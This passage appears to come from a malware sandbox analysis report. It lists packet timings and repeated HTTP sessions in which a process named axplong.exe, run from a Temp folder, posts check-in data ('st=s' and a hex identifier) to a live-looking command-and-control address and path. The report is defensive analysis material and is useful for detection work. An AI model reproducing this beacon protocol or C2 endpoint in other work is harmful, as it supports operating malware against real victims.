Sep 26, 2024 18:30:07.130213976 CEST	80	49780	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:07.130232096 CEST	80	49781	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:07.130297899 CEST	49780	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:07.130347967 CEST	49781	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:07.130489111 CEST	49781	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:07.135246038 CEST	80	49781	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:07.867284060 CEST	80	49781	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:07.867413998 CEST	49781	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:07.877125978 CEST	49781	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:07.878093958 CEST	49782	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:07.882370949 CEST	80	49781	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:07.882677078 CEST	49781	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:07.882894039 CEST	80	49782	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:07.882993937 CEST	49782	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:07.884569883 CEST	49782	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:07.890378952 CEST	80	49782	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:08.591595888 CEST	80	49782	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:08.591854095 CEST	49782	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:08.705249071 CEST	49782	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:08.705687046 CEST	49783	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:08.711458921 CEST	80	49782	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:08.711478949 CEST	80	49783	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:08.711518049 CEST	49782	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:08.711600065 CEST	49783	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:08.711709023 CEST	49783	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:08.717641115 CEST	80	49783	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:09.420989990 CEST	80	49783	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:09.421139956 CEST	49783	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:09.428148985 CEST	49783	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:09.433140039 CEST	80	49783	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:09.657274008 CEST	80	49783	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:09.659048080 CEST	49783	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:09.766598940 CEST	49783	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:09.766963005 CEST	49784	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:09.771703959 CEST	80	49783	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:09.771778107 CEST	49783	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:09.771958113 CEST	80	49784	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:09.772058010 CEST	49784	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:09.772277117 CEST	49784	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:09.777107000 CEST	80	49784	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:10.498146057 CEST	80	49784	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:10.498198986 CEST	49784	80	192.168.2.6	185.215.113.16

HTTP Request Dependency Graph

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49720	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:02.924305916 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:03.650181055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:03.652704000 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:03.882004023 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49721	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:04.003832102 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:04.715169907 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:04.716381073 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:04.944526911 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49722	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:05.065445900 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:05.784467936 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:05.785368919 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:06.014287949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49723	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:06.128329039 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:06.841623068 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:06.842906952 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:07.073262930 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49724	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:07.190948963 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:07.912728071 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:07.913733959 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:08.141066074 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49725	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:08.253267050 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:08.942171097 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:08.943064928 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:09.174534082 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49726	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:09.284492016 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:10.045361042 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:10.046216011 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:10.285099030 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49727	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:10.393815041 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:11.168631077 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:11.169435024 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:11.398538113 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49728	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:11.521265984 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:12.247832060 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:12.248661995 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:12.495443106 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49729	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:12.617435932 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:13.351587057 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:13.352613926 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:13.581979036 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49730	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:13.693623066 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:14.480070114 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:14.480901957 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
